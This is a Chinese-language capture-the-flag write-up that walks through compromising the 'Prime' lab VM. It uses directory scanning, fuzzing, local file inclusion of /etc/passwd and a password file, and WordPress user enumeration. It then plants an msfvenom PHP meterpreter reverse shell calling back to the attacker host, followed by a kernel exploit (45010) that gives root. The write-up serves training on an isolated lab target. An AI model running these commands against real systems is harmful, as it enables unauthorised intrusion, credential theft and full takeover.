prime靶机cve-45010复现
-
前期准备
使用nmap -sP 192.168.136.1/24
找出这台靶机的ip:192.168.136.128
本机ip:192.168.136.129
-
扫描目录
dirb 192.168.136.128
记住扫到的这个网站先留个伏笔
dirb 192.168.136.128 -X .php,.txt,.zip
扫出俩php网站和一个提示网站
- http://192.168.136.128/image.php (CODE:200|SIZE:147)
- http://192.168.136.128/index.php (CODE:200|SIZE:136)
- http://192.168.136.128/secret.txt (CODE:200|SIZE:412)
根据提示网站的内容,进行模糊测试
-
wfuzz模糊测试
wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.136.128/image.php?FUZZ
发现很多都是7行12个单词136个字符串,那我们过滤一下
过滤的参数
hc:状态码
hl:行
hw:单词
hh:字符数
wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt --hl 6 http://192.168.136.128/image.php?FUZZ
打开这个网页
然后再根据提示网站上的location.txt尝试
得到
所以我们可以到扫到的另外一个网站下尝试
说明secrettier360是一个可控的参数
- 文件包含
我们来看看家常便饭的/etc/passwd哈哈哈
在这看不方便,到kali上用curl命令查看
curl http://192.168.136.128/image.php?secrettier360=/etc/passwd
发现倒数第三行很可疑有个password.txt
http://192.168.136.128/image.php?secrettier360=/home/saket/password.txt
发现了个密码
尝试进入靶机,发现不是
根据之前的
猜测可能是这个网站内部用户的密码
有了密码,那用户呢?
-
找此网站下的用户
用cmseek -u http://192.168.136.128/wordpress/扫描
没扫出,尬住,换一个工具
wpscan --url http://192.168.136.128/wordpress --enumerate u
发现了个用户名,这网站也只有这一个用户,尝试登陆
登陆成功进入了后台
找到了个php可以写码
-
利用msfconsole生成一个php的payload
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.136.129 LPORT=9999 -o payload.php
然后打开msf的监听
开始监听
然后在网上搜索主题路径位置或者自行搭建wordpress的网站找到该写码的路径
监听成功
由于用户权限的限制接下来尝试提权
-
提权操作
用msf搜索这个版本有没有可利用漏洞
searchsploit Ubuntu 16.04
找到个可以利用的漏洞
用gcc命令编译成可执行程序
然后用meterpreter的upload命令将木马传到被攻击机上
upload /root/45010 /tmp/45010
传到/tmp目录是因为tmp目录任意一个用户都能有读写权限
进入shell
提权成功
进入root目录下
找到flag